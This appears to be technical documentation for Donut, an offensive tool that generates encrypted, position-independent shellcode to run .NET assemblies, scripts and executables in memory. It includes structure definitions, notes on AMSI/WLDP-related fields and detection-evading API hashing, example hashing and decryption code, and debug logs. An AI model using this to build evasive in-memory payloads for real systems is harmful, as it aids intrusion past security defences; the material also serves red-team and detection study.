```c
int DonutCreate(PDONUT_CONFIG pConfig);
int DonutDelete(PDONUT_CONFIG pConfig);
```
When provided with a valid configuration, DonutCreate will generate shellcode to execute a VBS/JS/EXE/DLL or XSL file in-memory. If the function returns DONUT_ERROR_SUCCESS, the configuration will contain three components: an encrypted Module, an encrypted Instance, and the position-independent code (PIC) with the Instance attached.

The key to decrypt the Module is stored in the Instance, so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt its contents without the instance. DonutDelete will release any memory allocated by a successful call to DonutCreate. The Instance will already be attached to the PIC, ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.
A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.
```c
typedef struct _DONUT_CONFIG {
    int      arch;                                      // target architecture for shellcode
    char     domain[DONUT_MAX_NAME];                    // name of domain to create for assembly
    char     cls[DONUT_MAX_NAME];                       // name of class and optional namespace
    char     method[DONUT_MAX_NAME];                    // name of method to execute
    char     param[(DONUT_MAX_PARAM+1)*DONUT_MAX_NAME]; // string parameters passed to method, separated by comma or semi-colon
    char     file[DONUT_MAX_NAME];                      // assembly to create module from
    char     url[DONUT_MAX_URL];                        // points to root path of where module will be on remote http server
    char     runtime[DONUT_MAX_NAME];                   // runtime version to use.
    char     modname[DONUT_MAX_NAME];                   // name of module written to disk
    int      mod_type;                                  // .NET EXE/DLL, VBS,JS,EXE,DLL,XSL
    uint64_t mod_len;                                   // size of DONUT_MODULE
    void     *mod;                                      // points to donut module
    int      inst_type;                                 // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL
    uint64_t inst_len;                                  // size of DONUT_INSTANCE
    void     *inst;                                     // points to donut instance
    uint64_t pic_len;                                   // size of shellcode
    void     *pic;                                      // points to PIC/shellcode
} DONUT_CONFIG, *PDONUT_CONFIG;
```
Member | Description |
---|---|
arch | Indicates the type of assembly code to generate. DONUT_ARCH_X86 and DONUT_ARCH_X64 are self-explanatory. DONUT_ARCH_X84 indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point. |
domain | AppDomain name to create. If one is not specified by the caller, it will be generated randomly. |
cls | The class name with the method to invoke. A namespace is optional, e.g. namespace.class |
method | The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL. |
param | Contains a list of parameters for the .NET method or DLL function, each separated by a semi-colon or comma. |
file | The path of a supported file type: VBS/JS/EXE/DLL or XSL. |
url | If the type is DONUT_INSTANCE_URL, this should contain the server and path of where the module will be stored, e.g. https://www.rogueserver.com/modules/ |
runtime | The CLR runtime version to use for the .NET assembly. If none is provided, donut will try to read it from the meta header. If that fails, v4.0.30319 is used by default. |
modname | If the type is DONUT_INSTANCE_URL, this will contain a randomly generated name for the module that should be used when saving the contents of mod to disk. |
mod_type | Indicates the type of file detected by DonutCreate. For example, DONUT_MODULE_VBS indicates a VBScript file. |
mod_len | The total size of the Module pointed to by mod. |
mod | Points to the encrypted Module. If the type is DONUT_INSTANCE_URL, this should be saved to a file using modname and made accessible via an HTTP server. |
inst_type | DONUT_INSTANCE_PIC indicates a self-contained payload, which means the .NET assembly is embedded in the executable code. DONUT_INSTANCE_URL indicates the .NET assembly is stored on a remote server with a URL embedded in the instance. |
inst_len | The total size of the Instance pointed to by inst. |
inst | Points to an encrypted Instance after a successful call to DonutCreate. Since it's already attached to the pic, this is only provided for debugging purposes. |
pic_len | The size of data pointed to by pic. |
pic | Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process. |
Everything that follows here concerns the internal workings of Donut and is not required to generate a payload.

The position-independent code will always contain an Instance, which can be viewed simply as a configuration for the code itself. It holds all the data that would normally be stored on the stack or in the .data and .rodata sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the addresses of API functions. If successful, it will check whether an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the sig field is hashed using Maru and compared with the value of mac.
```c
// everything required for an instance goes into the following structure
typedef struct _DONUT_INSTANCE {
    uint32_t    len;                          // total size of instance
    DONUT_CRYPT key;                          // decrypts instance
    uint64_t    iv;                           // the 64-bit initial value for maru hash

    union {
      uint64_t  hash[64];                     // holds up to 64 api hashes
      void     *addr[64];                     // holds up to 64 api addresses
      // include prototypes only if header included from payload.h
      #ifdef PAYLOAD_H
      struct {
        // imports from kernel32.dll or kernelbase.dll
        LoadLibraryA_t             LoadLibraryA;
        GetProcAddress_t           GetProcAddress;
        GetModuleHandleA_t         GetModuleHandleA;
        VirtualAlloc_t             VirtualAlloc;     // required to allocate RW memory for instance
        VirtualFree_t              VirtualFree;
        VirtualQuery_t             VirtualQuery;
        VirtualProtect_t           VirtualProtect;
        Sleep_t                    Sleep;
        MultiByteToWideChar_t      MultiByteToWideChar;
        GetUserDefaultLCID_t       GetUserDefaultLCID;

        // imports from oleaut32.dll
        SafeArrayCreate_t          SafeArrayCreate;
        SafeArrayCreateVector_t    SafeArrayCreateVector;
        SafeArrayPutElement_t      SafeArrayPutElement;
        SafeArrayDestroy_t         SafeArrayDestroy;
        SafeArrayGetLBound_t       SafeArrayGetLBound;
        SafeArrayGetUBound_t       SafeArrayGetUBound;
        SysAllocString_t           SysAllocString;
        SysFreeString_t            SysFreeString;
        LoadTypeLib_t              LoadTypeLib;

        // imports from wininet.dll
        InternetCrackUrl_t         InternetCrackUrl;
        InternetOpen_t             InternetOpen;
        InternetConnect_t          InternetConnect;
        InternetSetOption_t        InternetSetOption;
        InternetReadFile_t         InternetReadFile;
        InternetCloseHandle_t      InternetCloseHandle;
        HttpOpenRequest_t          HttpOpenRequest;
        HttpSendRequest_t          HttpSendRequest;
        HttpQueryInfo_t            HttpQueryInfo;

        // imports from mscoree.dll
        CorBindToRuntime_t         CorBindToRuntime;
        CLRCreateInstance_t        CLRCreateInstance;

        // imports from ole32.dll
        CoInitializeEx_t           CoInitializeEx;
        CoCreateInstance_t         CoCreateInstance;
        CoUninitialize_t           CoUninitialize;
      };
      #endif
    } api;

    // everything from here is encrypted
    int         api_cnt;                      // the 64-bit hashes of API required for instance to work
    int         dll_cnt;                      // the number of DLL to load before resolving API
    char        dll_name[DONUT_MAX_DLL][32];  // a list of DLL strings to load

    union {
      char      s[8];                         // amsi.dll
      uint32_t  w[2];
    } amsi;
    char        clr[8];                       // clr.dll
    char        wldp[16];                     // wldp.dll

    char        wldpQuery[32];                // WldpQueryDynamicCodeTrust
    char        wldpIsApproved[32];           // WldpIsClassInApprovedList
    char        amsiInit[16];                 // AmsiInitialize
    char        amsiScanBuf[16];              // AmsiScanBuffer
    char        amsiScanStr[16];              // AmsiScanString

    uint16_t    wscript[8];                   // WScript
    uint16_t    wscript_exe[16];              // wscript.exe

    GUID        xIID_IUnknown;
    GUID        xIID_IDispatch;

    // GUID required to load .NET assemblies
    GUID        xCLSID_CLRMetaHost;
    GUID        xIID_ICLRMetaHost;
    GUID        xIID_ICLRRuntimeInfo;
    GUID        xCLSID_CorRuntimeHost;
    GUID        xIID_ICorRuntimeHost;
    GUID        xIID_AppDomain;

    // GUID required to run VBS and JS files
    GUID        xCLSID_ScriptLanguage;        // vbs or js
    GUID        xIID_IHost;                   // wscript object
    GUID        xIID_IActiveScript;           // engine
    GUID        xIID_IActiveScriptSite;       // implementation
    GUID        xIID_IActiveScriptParse32;    // parser
    GUID        xIID_IActiveScriptParse64;

    // GUID required to run XSL files
    GUID        xCLSID_DOMDocument30;
    GUID        xIID_IXMLDOMDocument;
    GUID        xIID_IXMLDOMNode;

    int         type;                         // DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL

    struct {
      char      url[DONUT_MAX_URL];           // staging server hosting donut module
      char      req[8];                       // just a buffer for "GET"
    } http;

    uint8_t     sig[DONUT_MAX_NAME];          // string to hash
    uint64_t    mac;                          // to verify decryption ok

    DONUT_CRYPT mod_key;                      // used to decrypt module
    uint64_t    mod_len;                      // total size of module

    union {
      PDONUT_MODULE p;                        // for URL
      DONUT_MODULE  x;                        // for PIC
    } module;
} DONUT_INSTANCE, *PDONUT_INSTANCE;
```
Modules can be embedded in an Instance or stored on a remote HTTP server.
```c
// everything required for a module goes in the following structure
typedef struct _DONUT_MODULE {
    DWORD   type;                                   // EXE, DLL, JS, VBS, XSL
    WCHAR   runtime[DONUT_MAX_NAME];                // runtime version for .NET EXE/DLL
    WCHAR   domain[DONUT_MAX_NAME];                 // domain name to use for .NET EXE/DLL
    WCHAR   cls[DONUT_MAX_NAME];                    // name of class and optional namespace for .NET EXE/DLL
    WCHAR   method[DONUT_MAX_NAME];                 // name of method to invoke for .NET DLL or api for unmanaged DLL
    DWORD   param_cnt;                              // number of parameters for DLL/EXE
    WCHAR   param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters for DLL/EXE
    CHAR    sig[DONUT_MAX_NAME];                    // random string to verify decryption
    ULONG64 mac;                                    // to verify decryption was ok
    ULONG64 len;                                    // size of EXE/DLL/XSL/JS/VBS file
    BYTE    data[4];                                // data of EXE/DLL/XSL/JS/VBS file
} DONUT_MODULE, *PDONUT_MODULE;
```
A hash function called Maru is used to resolve the addresses of APIs at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5, except that only 32 bits of the string length are stored in the buffer instead of 64 bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving API addresses to decrease the chance of detection.
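The Maru construction just described, together with the sig/mac check from the Instance section, as an added example that is not the project's maru.c: SPECK64/128 follows the published specification and is checked against its published test vector, while the exact padding layout, the 64-byte string limit and the word order of the 64-bit state are assumptions, so hashes need not match the values in the debug output further down.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#define MARU_BLK_LEN 16   // one message block = one SPECK64/128 key (16 bytes)
#define MARU_MAX_STR 64   // longest API string hashed (assumption)
#define ROTR32(v, n) (((v) >> (n)) | ((v) << (32 - (n))))
#define ROTL32(v, n) (((v) << (n)) | ((v) >> (32 - (n))))
// SPECK64/128 on the 64-bit block (x, y): 27 rounds, round keys expanded on
// the fly from the 16-byte key read as little-endian words.
static void speck64_encrypt(const uint8_t mk[16], uint32_t *x, uint32_t *y) {
    uint32_t k[4], t;
    for (int i = 0; i < 4; i++)
        k[i] = (uint32_t)mk[4*i] | (uint32_t)mk[4*i+1] << 8 |
               (uint32_t)mk[4*i+2] << 16 | (uint32_t)mk[4*i+3] << 24;
    for (uint32_t i = 0; i < 27; i++) {
        *x = (ROTR32(*x, 8) + *y) ^ k[0];          // data round
        *y = ROTL32(*y, 3) ^ *x;
        t = k[3];                                   // key schedule round
        k[3] = (ROTR32(k[1], 8) + k[0]) ^ i;
        k[0] = ROTL32(k[0], 3) ^ k[3];
        k[1] = k[2];
        k[2] = t;
    }
}
// Published SPECK64/128 test vector; returns 1 when the cipher reproduces it.
static int speck64_selftest(void) {
    static const uint8_t key[16] = {0x00,0x01,0x02,0x03,0x08,0x09,0x0a,0x0b,
                                    0x10,0x11,0x12,0x13,0x18,0x19,0x1a,0x1b};
    uint32_t x = 0x3b726574, y = 0x7475432d;
    speck64_encrypt(key, &x, &y);
    return x == 0x8c6fa548 && y == 0x454e028b;
}
// Davies-Meyer compression: h' = E_m(h) ^ h, the message block m is the key.
static uint64_t maru_compress(const uint8_t m[16], uint64_t h) {
    uint32_t x = (uint32_t)h, y = (uint32_t)(h >> 32);   // word order assumed
    speck64_encrypt(m, &x, &y);
    return (((uint64_t)y << 32) | x) ^ h;
}
// Maru: MD4/MD5-style padding (0x80, zeros, length) but with a 32-bit bit
// length in the last word of the final 16-byte block; chained from iv.
uint64_t maru(const char *api, uint64_t iv) {
    uint8_t  m[MARU_BLK_LEN];
    uint64_t h = iv;
    int idx = 0, len = 0, end = 0;
    while (!end) {
        if (api[len] == 0 || len == MARU_MAX_STR) {
            memset(&m[idx], 0, MARU_BLK_LEN - idx);
            m[idx] = 0x80;                              // end-of-message marker
            if (idx >= MARU_BLK_LEN - 4) {              // no room for the length:
                h = maru_compress(m, h);                // flush, length gets its own block
                memset(m, 0, MARU_BLK_LEN);
            }
            uint32_t bits = (uint32_t)len * 8;
            m[12] = (uint8_t)bits;         m[13] = (uint8_t)(bits >> 8);
            m[14] = (uint8_t)(bits >> 16); m[15] = (uint8_t)(bits >> 24);
            idx = MARU_BLK_LEN; end = 1;
        } else {
            m[idx++] = (uint8_t)api[len++];
        }
        if (idx == MARU_BLK_LEN) { h = maru_compress(m, h); idx = 0; }
    }
    return h;
}
// The check the payload makes after decrypting: hash sig under iv, compare to mac.
int maru_verify(const char *sig, uint64_t iv, uint64_t mac) {
    return maru(sig, iv) == mac;
}
int main(void) {   // the same API name hashes differently under each instance's IV
    uint64_t iv[2] = {0x0123456789abcdefULL, 0xfedcba9876543210ULL};   // constructed
    for (int i = 0; i < 2; i++)
        printf("iv=%016llx LoadLibraryA=%016llx\n", (unsigned long long)iv[i],
               (unsigned long long)maru("LoadLibraryA", iv[i]));
    return speck64_selftest() ? 0 : 1;
}
```

Because the IV is folded into every hash, a static list of API hashes is not a usable signature; a detection has to recover the IV from the instance first.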
The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.
```c
typedef struct _DONUT_CRYPT {
    BYTE    mk[DONUT_KEY_LEN];   // master key
    BYTE    ctr[DONUT_BLK_LEN];  // counter + nonce
} DONUT_CRYPT, *PDONUT_CRYPT;
```
Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a Module or an Instance at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key, which is stored in the donut payload.
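An added example, not the project's chaskey.c: the Chaskey-LTS permutation used as a block cipher in CTR mode over the DONUT_CRYPT layout from above. The Even-Mansour key whitening, the 16-round count and the little-endian counter increment are assumptions about the project's implementation; the demo key and counter are constructed, where donut generates both randomly.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DONUT_KEY_LEN  16
#define DONUT_BLK_LEN  16
#define CHASKEY_ROUNDS 16   // Chaskey-LTS round count (assumption)
#define ROTL32(v, n) (((v) << (n)) | ((v) >> (32 - (n))))

typedef struct _DONUT_CRYPT {
    uint8_t mk[DONUT_KEY_LEN];    // master key
    uint8_t ctr[DONUT_BLK_LEN];   // counter + nonce
} DONUT_CRYPT, *PDONUT_CRYPT;

static uint32_t load32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void store32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
// Chaskey permutation as a 128-bit block cipher: key XORed in before and after
// the rounds (Even-Mansour form, assumed to match the project's use of it).
static void chaskey_encrypt(const uint8_t mk[16], uint8_t blk[16]) {
    uint32_t k[4], v[4];
    for (int i = 0; i < 4; i++) { k[i] = load32(mk + 4*i); v[i] = load32(blk + 4*i) ^ k[i]; }
    for (int r = 0; r < CHASKEY_ROUNDS; r++) {
        v[0] += v[1]; v[1] = ROTL32(v[1], 5);  v[1] ^= v[0]; v[0] = ROTL32(v[0], 16);
        v[2] += v[3]; v[3] = ROTL32(v[3], 8);  v[3] ^= v[2];
        v[0] += v[3]; v[3] = ROTL32(v[3], 13); v[3] ^= v[0];
        v[2] += v[1]; v[1] = ROTL32(v[1], 7);  v[1] ^= v[2]; v[2] = ROTL32(v[2], 16);
    }
    for (int i = 0; i < 4; i++) store32(blk + 4*i, v[i] ^ k[i]);
}
// CTR mode: keystream block = E_mk(ctr) XORed over the data, ctr incremented per
// block (little-endian, assumed). Encrypt and decrypt are the same call; a short
// final block uses only part of the last keystream block. The caller's counter
// is copied, so one DONUT_CRYPT decrypts exactly what it encrypted.
void donut_ctr(const DONUT_CRYPT *c, uint8_t *data, size_t len) {
    uint8_t ctr[DONUT_BLK_LEN], ks[DONUT_BLK_LEN];
    memcpy(ctr, c->ctr, DONUT_BLK_LEN);
    while (len) {
        size_t n = len < DONUT_BLK_LEN ? len : DONUT_BLK_LEN;
        memcpy(ks, ctr, DONUT_BLK_LEN);
        chaskey_encrypt(c->mk, ks);
        for (size_t i = 0; i < n; i++) data[i] ^= ks[i];
        data += n; len -= n;
        for (int i = 0; i < DONUT_BLK_LEN && ++ctr[i] == 0; i++) { }
    }
}
// Round-trips a constructed 37-byte "module" (deliberately not a multiple of the
// block size). Returns 1 when the right key restores it and a key differing in
// a single bit does not.
int donut_ctr_demo(void) {
    static const uint8_t plain[] = "DONUT_MODULE sig=ABCDEFGH data=MZ...!";
    const size_t n = sizeof plain - 1;
    uint8_t buf[sizeof plain];
    DONUT_CRYPT c, wrong;
    for (int i = 0; i < DONUT_KEY_LEN; i++) {      // constructed key and counter;
        c.mk[i]  = (uint8_t)(0x11 * i + 1);         // donut generates both randomly
        c.ctr[i] = (uint8_t)(0xf0 - i);
    }
    wrong = c; wrong.mk[0] ^= 0x01;
    memcpy(buf, plain, n);
    donut_ctr(&c, buf, n);                          // encrypt
    if (memcmp(buf, plain, n) == 0) return 0;
    donut_ctr(&wrong, buf, n);                      // wrong key: still garbage
    if (memcmp(buf, plain, n) == 0) return 0;
    donut_ctr(&wrong, buf, n);                      // undo the wrong-key pass
    donut_ctr(&c, buf, n);                          // decrypt with the real key
    return memcmp(buf, plain, n) == 0;
}
int main(void) {
    printf("Chaskey-CTR round-trip: %s\n", donut_ctr_demo() ? "OK" : "FAILED");
    return 0;
}
```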
The payload is capable of displaying detailed information about each step of executing a file in-memory, which can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.

```
nmake debug -f Makefile.msvc
make debug -f Makefile.mingw
```
Use donut to create a payload as you normally would and a file called instance will be saved to disk.
```
c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe

  [ Donut shellcode generator v0.9.2
  [ Copyright (c) 2019 TheWover, Odzhan

DEBUG: donut.c:822:DonutCreate(): Entering.
DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
DEBUG: donut.c:840:DonutCreate(): Validating instance type
DEBUG: donut.c:880:DonutCreate(): Validating architecture
DEBUG: donut.c:277:get_file_info(): Entering.
DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
DEBUG: donut.c:320:get_file_info(): Module is DLL
DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
DEBUG: donut.c:231:map_file(): Opening Class1.dll
DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
DEBUG: donut.c:336:get_file_info(): Checking DOS header
DEBUG: donut.c:342:get_file_info(): Checking NT header
DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
DEBUG: donut.c:356:get_file_info(): Checking characteristics
DEBUG: donut.c:368:get_file_info(): COM Directory found
DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
DEBUG: donut.c:395:get_file_info(): Leaving.
DEBUG: donut.c:944:DonutCreate(): Creating module
DEBUG: donut.c:516:CreateModule(): Entering.
DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
DEBUG: donut.c:549:CreateModule(): Class : TestClass
DEBUG: donut.c:552:CreateModule(): Method : RunProcess
DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
DEBUG: donut.c:610:CreateModule(): Leaving.
DEBUG: donut.c:951:DonutCreate(): Creating instance
DEBUG: donut.c:621:CreateInstance(): Entering.
DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
DEBUG: donut.c:649:CreateInstance(): Generating random key for module
DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
DEBUG: donut.c:796:CreateInstance(): encrypting instance
DEBUG: donut.c:808:CreateInstance(): Leaving.
DEBUG: donut.c:959:DonutCreate(): Saving instance to file
DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
DEBUG: donut.c:259:unmap_file(): Unmapping
DEBUG: donut.c:262:unmap_file(): Closing
DEBUG: donut.c:1061:DonutCreate(): Leaving.

  [ Instance type : PIC
  [ Module file : "Class1.dll"
  [ File type : .NET DLL
  [ Class : TestClass
  [ Method : RunProcess
  [ Parameters : calc.exe,notepad.exe
  [ Target CPU : x86+AMD64
  [ Shellcode : "payload.bin"

DEBUG: donut.c:1069:DonutDelete(): Entering.
DEBUG: donut.c:1088:DonutDelete(): Leaving.
```
Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.
```
c:\hub\donut\payload>payload ..\instance
Running...
DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
